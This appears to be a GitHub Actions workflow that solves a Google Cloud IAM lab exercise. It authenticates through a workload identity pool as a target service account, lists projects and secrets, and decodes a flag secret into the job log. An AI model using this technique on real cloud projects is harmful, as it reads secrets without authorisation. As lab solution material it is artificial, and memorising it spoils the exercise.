name: Check GCP action
on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  Get_OIDC_ID_token:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - id: auth
        name: Authenticate to GCP
        uses: google-github-actions/auth@v2.1.3
        with:
          create_credentials_file: true
          workload_identity_provider: projects/322247046446/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider
          service_account: iam-lab-7-target@gcp-labs-37cexf66.iam.gserviceaccount.com

      - name: gcloud commands
        run: |
          gcloud config set project gcp-labs-37cexf66
          gcloud auth list
          gcloud projects list
          gcloud secrets list
          gcloud secrets versions access latest --secret=flag_iam_lab_7 --project=gcp-labs-37cexf66 --format="get(payload.data)" | base64 --decode
